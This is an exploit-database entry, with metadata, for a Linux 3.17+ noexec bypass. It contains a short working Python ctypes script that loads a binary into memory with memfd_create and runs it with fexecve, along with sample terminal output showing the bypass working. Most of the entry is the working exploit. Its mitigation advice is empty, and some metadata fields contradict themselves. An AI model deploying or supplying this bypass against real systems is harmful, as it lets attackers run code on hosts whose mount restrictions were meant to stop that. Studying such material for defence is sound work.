Linux >= 3.17 noexec bypass with python ctypes and memfd_create

vendor:

N/A

by:

soyer

7,2

CVSS

HIGH

Bypassing noexec restriction

264

CWE

Product Name: N/A

Affected Version From: Linux >= 3.17

Affected Version To: Linux >= 3.17

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 15.04 (x86_64)

2015

Linux >= 3.17 noexec bypass with python ctypes and memfd_create

This exploit is used to bypass the noexec restriction on Linux systems running version 3.17 or higher. It uses python ctypes and memfd_create to execute a file that would otherwise be blocked by the noexec restriction.

Mitigation:

Ensure that the noexec restriction is properly enforced on all systems.

Source

Exploit-DB raw data:

# Exploit Title: Linux >= 3.17 noexec bypass with python ctypes and memfd_create
# Date: 2015.10.14
# Exploit Author: soyer
# Version: linux >= 3.17
# Tested on: Ubuntu 15.04 (x86_64)
#
# usage:
#
#   $ ls -la exec_file
#   -rwxr-xr-x 1 soyer soyer 8600 Oct 14 15:04 exec_file
#   $ ./exec_file
#   bash: ./exec_file: Permission denied
#   $ mount |grep $(pwd)
#   tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
#   $ python noexec.py < exec_file
#   Hello world! fprintf=0x400470, stdout=0x7f63a3933740

from ctypes import *
c = CDLL("libc.so.6")
fd = c.syscall(319,"tempmem",0)
c.sendfile(fd,0,0,0x7ffff000)
c.fexecve(fd,byref(c_char_p()),byref(c_char_p()))
print "fexecve failed"